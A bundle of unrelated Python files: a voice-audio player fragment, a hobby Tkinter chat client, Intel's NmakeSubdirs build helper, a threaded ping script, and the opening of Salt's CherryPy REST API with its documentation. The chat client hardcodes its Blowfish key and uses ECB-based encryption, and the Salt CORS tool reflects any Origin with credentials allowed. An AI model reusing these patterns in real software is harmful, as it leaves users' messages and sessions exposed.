play_audio = self.client.send_audio_packet
self._speak(True)
while not self._end.is_set():
# are we paused?
if not self._resumed.is_set():
# wait until we aren't
self._resumed.wait()
continue
# are we disconnected from voice?
if not self._connected.is_set():
# wait until we are connected
self._connected.wait()
# reset our internal data
self.loops = 0
self._start = time.perf_counter()
self.loops += 1
data = self.source.read()
if not data:
self.stop()
break
play_audio(data, encode=not self.source.is_opus())
next_time = self._start + self.DELAY * self.loops
delay = max(0, self.DELAY + (next_time - time.perf_counter()))
time.sleep(delay)
def run(self) -> None:
try:
self._do_run()
except Exception as exc:
self._current_error = exc
self.stop()
finally:
self.source.cleanup()
self._call_after()
def _call_after(self) -> None:
error = self._current_error
if self.after is not None:
try:
self.after(error)
except Exception as exc:
_log.exception('Calling the after function failed.')
exc.__context__ = error
traceback.print_exception(type(exc), exc, exc.__traceback__)
elif error:
msg = f'Exception in voice thread {self.name}'
_log.exception(msg, exc_info=error)
print(msg, file=sys.stderr)
traceback.print_exception(type(error), error, error.__traceback__)
def stop(self) -> None:
self._end.set()
self._resumed.set()
self._speak(False)
def pause(self, *, update_speaking: bool = True) -> None:
self._resumed.clear()
if update_speaking:
self._speak(False)
def resume(self, *, update_speaking: bool = True) -> None:
self.loops = 0
self._start = time.perf_counter()
self._resumed.set()
if update_speaking:
self._speak(True)
def is_playing(self) -> bool:
return self._resumed.is_set() and not self._end.is_set()
def is_paused(self) -> bool:
return not self._end.is_set() and not self._resumed.is_set()
def _set_source(self, source: AudioSource) -> None:
with self._lock:
self.pause(update_speaking=False)
self.source = source
self.resume(update_speaking=False)
def _speak(self, speaking: bool) -> None:
try:
asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
except Exception as e:
_log.info("Speaking call in player failed: %s", e)
|
fluffchat-client.py
|
import socket  # lets me use TCP sockets
import tkinter  # handles GUI
import base64
import blowfish  # handles encryption
from threading import Thread  # allows multi-threading
from datetime import datetime  # lets me get the current time
cipher = blowfish.Cipher(b"thisIsATest")
# server's IP address
print("some ip here is the default server port will always be 5002")
SERVER_HOST = input("input server ip input: ")
SERVER_PORT = 5002 # server's port
separator_token = "<SEP>" # seperates client name and message sent by client
# initialize TCP socket
s = socket.socket()
print(f"[*] Connecting to {SERVER_HOST}:{SERVER_PORT}...")
# connect to the server
s.connect((SERVER_HOST, SERVER_PORT))# connect to server
print("[+] Connected.")
#ask for name
name = input("Enter your name: ")
def receive():  # run this when a message is received
while True:
message = s.recv(1024)# get message from server
#decrypt message
message = b"".join(cipher.decrypt_ecb_cts(message))
message = base64.b64decode(message)
message = message.decode('utf8')
message = message.replace(separator_token, ": ")
msg_list.insert(tkinter.END, message)# print message to GUI
def send(event=None): #run this when you send message
date_now = datetime.now().strftime('%d/%m/%Y %H:%M')
sendNow = f"{date_now} {name} {separator_token} {to_send.get()}" # string to send to server
#encrypt message
sendNow = sendNow.encode('utf8')
sendNow_b64 = base64.b64encode(sendNow)
sendNow_b64 = b"".join(cipher.encrypt_ecb_cts(sendNow_b64))
# send the message
print(sendNow_b64)
s.send(sendNow_b64)# value must be byte to send
to_send.set(" ")
# start gui
top = tkinter.Tk()
fluffChatName = tkinter.Label(text="Fluffchat", foreground="#FFFFFF", background="#36393F")# set label at top of window to say fluffchat
top.title("fluffchat") #set title of window
top.geometry("800x700")#set size of window
top.configure(bg='#36393F')
messages_frame = tkinter.Frame(top)  # create message frame for received messages
to_send = tkinter.StringVar() # create variable for the message you send
to_send.set("Type message here") #placeholder text for text box
scrollbar = tkinter.Scrollbar(messages_frame)# make scrollbar easy to access in rest of code
msg_list = tkinter.Listbox(messages_frame, height=30, width=115, yscrollcommand=scrollbar.set)  # create box for received messages
# pack things for GUI
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
msg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
msg_list.pack()
fluffChatName.pack()
scrollbar.config( command = msg_list.yview )# config to make scrollbar work
messages_frame.pack()
#create message field and send button
entry_field = tkinter.Entry(top, textvariable=to_send, width=70)
entry_field.bind("<Return>", send)
entry_field.pack(pady=7)
send_button = tkinter.Button(top, text="Send", command=send, width=30)# make send button
send_button.pack(pady=5)
# threading for receiving messages
receive_thread = Thread(target=receive)
receive_thread.start()
#keep gui running
tkinter.mainloop()
# close the socket
s.close()
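# --- Editor's note: round-trip sketch appended by the editor, not part of the client. ---
# send() encodes the text as UTF-8, base64-encodes it, then encrypts it with Blowfish in
# ECB-CTS mode; receive() reverses those steps. A standalone round trip using the same
# 'blowfish' package looks like this (illustrative only):
#     demo_cipher = blowfish.Cipher(b"thisIsATest")
#     plaintext = "12/05/2024 10:30 alice <SEP> hello".encode("utf8")
#     wire = b"".join(demo_cipher.encrypt_ecb_cts(base64.b64encode(plaintext)))
#     back = base64.b64decode(b"".join(demo_cipher.decrypt_ecb_cts(wire))).decode("utf8")
#     assert back == plaintext.decode("utf8")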
|
NmakeSubdirs.py
|
# @file NmakeSubdirs.py
# This script supports parallel builds for nmake in a Windows environment.
# It supports both Python 2.x and Python 3.x.
#
# Copyright (c) 2018, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
#
# Import Modules
#
from __future__ import print_function
import argparse
import threading
import time
import os
import subprocess
import multiprocessing
import copy
import sys
__prog__ = 'NmakeSubdirs'
__version__ = '%s Version %s' % (__prog__, '0.10 ')
__copyright__ = 'Copyright (c) 2018, Intel Corporation. All rights reserved.'
__description__ = 'Replacement for NmakeSubdirs.bat on Windows; supports parallel build for nmake.\n'
cpu_count = multiprocessing.cpu_count()
output_lock = threading.Lock()
def RunCommand(WorkDir=None, *Args, **kwargs):
if WorkDir is None:
WorkDir = os.curdir
if "stderr" not in kwargs:
kwargs["stderr"] = subprocess.STDOUT
if "stdout" not in kwargs:
kwargs["stdout"] = subprocess.PIPE
p = subprocess.Popen(Args, cwd=WorkDir, stderr=kwargs["stderr"], stdout=kwargs["stdout"])
stdout, stderr = p.communicate()
message = ""
if stdout is not None:
message = stdout.decode(errors='ignore') #for compatibility in python 2 and 3
if p.returncode != 0:
raise RuntimeError("Error while execute command \'{0}\' in direcotry {1}\n{2}".format(" ".join(Args), WorkDir, message))
output_lock.acquire(True)
print("execute command \"{0}\" in directory {1}".format(" ".join(Args), WorkDir))
try:
print(message)
except:
pass
output_lock.release()
return p.returncode, stdout
class TaskUnit(object):
def __init__(self, func, args, kwargs):
self.func = func
self.args = args
self.kwargs = kwargs
def __eq__(self, other):
return id(self).__eq__(id(other))
def run(self):
return self.func(*self.args, **self.kwargs)
def __str__(self):
para = list(self.args)
para.extend("{0}={1}".format(k, v)for k, v in self.kwargs.items())
return "{0}({1})".format(self.func.__name__, ",".join(para))
class ThreadControl(object):
def __init__(self, maxthread):
self._processNum = maxthread
self.pending = []
self.running = []
self.pendingLock = threading.Lock()
self.runningLock = threading.Lock()
self.error = False
self.errorLock = threading.Lock()
self.errorMsg = "errorMsg"
def addTask(self, func, *args, **kwargs):
self.pending.append(TaskUnit(func, args, kwargs))
def waitComplete(self):
self._schedule.join()
def startSchedule(self):
self._schedule = threading.Thread(target=self.Schedule)
self._schedule.start()
def Schedule(self):
for i in range(self._processNum):
task = threading.Thread(target=self.startTask)
task.daemon = False
self.running.append(task)
self.runningLock.acquire(True)
for thread in self.running:
thread.start()
self.runningLock.release()
while len(self.running) > 0:
time.sleep(0.1)
if self.error:
print("subprocess not exit successfully")
print(self.errorMsg)
def startTask(self):
while True:
if self.error:
break
self.pendingLock.acquire(True)
if len(self.pending) == 0:
self.pendingLock.release()
break
task = self.pending.pop(0)
self.pendingLock.release()
try:
task.run()
except RuntimeError as e:
if self.error: break
self.errorLock.acquire(True)
self.error = True
self.errorMsg = str(e)
time.sleep(0.1)
self.errorLock.release()
break
self.runningLock.acquire(True)
self.running.remove(threading.currentThread())
self.runningLock.release()
def Run():
curdir = os.path.abspath(os.curdir)
if len(args.subdirs) == 1:
args.jobs = 1
if args.jobs == 1:
try:
for dir in args.subdirs:
RunCommand(os.path.join(curdir, dir), "nmake", args.target, stdout=sys.stdout, stderr=subprocess.STDOUT)
except RuntimeError:
exit(1)
else:
controller = ThreadControl(args.jobs)
for dir in args.subdirs:
controller.addTask(RunCommand, os.path.join(curdir, dir), "nmake", args.target)
controller.startSchedule()
controller.waitComplete()
if controller.error:
exit(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog=__prog__, description=__description__ + __copyright__, conflict_handler='resolve')
parser.add_argument("target", help="the target for nmake")
parser.add_argument("subdirs", nargs="+", help="the relative dir path of makefile")
parser.add_argument("--jobs", type=int, dest="jobs", default=cpu_count, help="thread number")
parser.add_argument('--version', action='version', version=__version__)
args = parser.parse_args()
Run()
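# --- Editor's note: usage sketch appended by the editor, not part of the original script. ---
# Command line: build the 'all' target in two sub-directories with four parallel jobs:
#     NmakeSubdirs.py all subdir1 subdir2 --jobs 4
# Programmatic use of the thread pool defined above (directory names are placeholders):
#     controller = ThreadControl(maxthread=4)
#     for subdir in ("subdir1", "subdir2"):
#         controller.addTask(RunCommand, subdir, "nmake", "all")
#     controller.startSchedule()
#     controller.waitComplete()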
|
pinging.py
|
import threading
import subprocess
def get_ping(host):
return subprocess.Popen(["ping", "-c", "1", "-n", host]).communicate()
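# --- Editor's note: variant sketch appended by the editor, not part of the original script. ---
# As written, get_ping() lets ping write straight to the terminal, so communicate()
# returns (None, None). To capture the output and report reachability instead, a
# thread target could look like this (illustrative only):
#     def ping_and_report(host):
#         proc = subprocess.Popen(["ping", "-c", "1", host],
#                                 stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
#         out, _ = proc.communicate()
#         print(host, "reachable" if proc.returncode == 0 else "unreachable")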
if __name__ == "__main__":
hosts = [
"google.com",
"yandex.ru",
"vk.com",
"habr.com",
"python.org",
"mipt.ru",
]
threads = [threading.Thread(target=get_ping, args=(host,)) for host in hosts]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module. Version 3.2.3 is currently recommended when
SSL is enabled, since this version worked the best with SSL in
internal testing. Versions 3.2.3 - 4.x can be used if SSL is not enabled.
Be aware that there is a known
`SSL error <https://bitbucket.org/cherrypy/cherrypy/issue/1298/ssl-not-working>`_
introduced in version 3.2.5. The issue was reportedly resolved with
CherryPy milestone 3.3, but the patch was committed for version 3.6.1.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/saltstack-netapi-client-java
- Python: https://github.com/saltstack/pepper
:configuration:
All authentication is done through Salt's :ref:`external auth
<acl-eauth>` system which requires additional configuration not described
here.
Example production-ready configuration; add to the Salt master config file
and restart the ``salt-master`` and ``salt-api`` daemons:
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
Using only a secure HTTPS connection is strongly recommended since Salt
authentication credentials will be sent over the wire.
A self-signed certificate can be generated using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution function.
Running this function requires pyOpenSSL and the ``salt-call`` script is
available in the ``salt-minion`` package.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways:
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
Commands are sent to a running Salt master via this module by sending HTTP
requests to the URLs detailed below.
.. admonition:: Content negotiation
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, x-www-form-urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
Data sent in :http:method:`post` and :http:method:`put` requests must be in
the format of a list of lowstate dictionaries. This allows multiple commands to
be executed in a single HTTP request. The order of commands in the request
corresponds to the return for each command in the response.
Lowstate, broadly, is a dictionary of values that are mapped to a function
call. This pattern is used pervasively throughout Salt. The functions called
from netapi modules are described in :ref:`Client Interfaces <netapi-clients>`.
The following example (in JSON format) causes Salt to execute two commands, a
command sent to minions as well as a runner function on the master::
[{
"client": "local",
"tgt": "*",
"fun": "test.fib",
"arg": ["10"]
},
{
"client": "runner",
"fun": "jobs.lookup_jid",
"jid": "20130603122505459265"
}]
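The same request can also be issued from Python. The sketch below is illustrative
only; it assumes the third-party ``requests`` library and the self-signed
certificate described above (hence ``verify=False``).
.. code-block:: python
    import requests
    # log in and grab a session token (see the Authentication section)
    login = requests.post('https://localhost:8000/login', verify=False,
                          headers={'Accept': 'application/json'},
                          data={'username': 'saltdev',
                                'password': 'saltdev',
                                'eauth': 'auto'})
    token = login.json()['return'][0]['token']
    # send a list of lowstate chunks in a single request
    resp = requests.post('https://localhost:8000', verify=False,
                         headers={'X-Auth-Token': token,
                                  'Accept': 'application/json'},
                         json=[{'client': 'local', 'tgt': '*', 'fun': 'test.ping'}])
    print(resp.json())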
.. admonition:: x-www-form-urlencoded
Sending JSON or YAML in the request body is simple and most flexible,
however sending data in urlencoded format is also supported with the
caveats below. It is the default format for HTML forms, many JavaScript
libraries, and the :command:`curl` command.
For example, the equivalent to running ``salt '*' test.ping`` is sending
``fun=test.ping&arg&client=local&tgt=*`` in the HTTP request body.
Caveats:
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
parameters. E.g., ``arg=one``, ``arg=two`` will be sent as ``arg[]=one``,
``arg[]=two``. This is not supported; send JSON or YAML instead.
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
from __future__ import absolute_import
# Import Python libs
import collections
import itertools
import functools
import logging
import json
import StringIO
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
import cherrypy
from cherrypy.lib import cpstats
import yaml
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
cherrypy.response.status = 403
return {
'status': cherrypy.response.status,
'return': "Bad IP",
}
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
return out(ret)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
def process_request_body(fn):
    '''
    A decorator to skip a processor function if process_request_body is False
    '''
    @functools.wraps(fn)
    def wrapped(*args, **kwargs):  # pylint: disable=C0111
        if cherrypy.request.process_request_body is not False:
            fn(*args, **kwargs)
    return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and not isinstance(data, list):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
cherrypy.tools.html_override = cherrypy.Tool('on_start_resource',
html_override_tool, priority=53)
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_handler',
cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
        # if the lowstate loaded isn't a list, let's notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
# Grab all available client interfaces
clients = [name for name, _ in inspect.getmembers(salt.netapi.NetapiClient,
predicate=inspect.ismethod) if not name.startswith('__')]
clients.remove('run') # run method calls client interfaces
return {
'return': "Welcome",
'clients': clients,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-H "Accept: application/x-yaml" \\
-H "X-Auth-Token: d40d1e1e<...snip...>" \\
-d client=local \\
-d tgt='*' \\
-d fun='test.ping' \\
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
fun=test.ping&client=local&tgt=*
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
**Other examples**:
.. code-block:: bash
# Sending multiple positional args with urlencoded:
curl -sSik https://localhost:8000 \\
-d client=local \\
-d tgt='*' \\
-d fun='cmd.run' \\
-d arg='du -sh .' \\
-d arg='/path/to/dir'
# Sending positional args and Keyword args with JSON:
echo '[
{
"client": "local",
"tgt": "*",
"fun": "cmd.run",
"arg": [
"du -sh .",
"/path/to/dir"
],
"kwarg": {
"shell": "/bin/sh",
"template": "jinja"
}
}
]' | curl -sSik https://localhost:8000 \\
-H 'Content-type: application/json' \\
-d@-
# Calling runner functions:
curl -sSik https://localhost:8000 \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682' \\
-d outputter=highstate
# Calling wheel functions:
curl -sSik https://localhost:8000 \\
-d client=wheel \\
-d fun='key.gen_accept' \\
-d id_=dave \\
-d keysize=4096
'''
return {
'return': list(self.exec_lowstate(
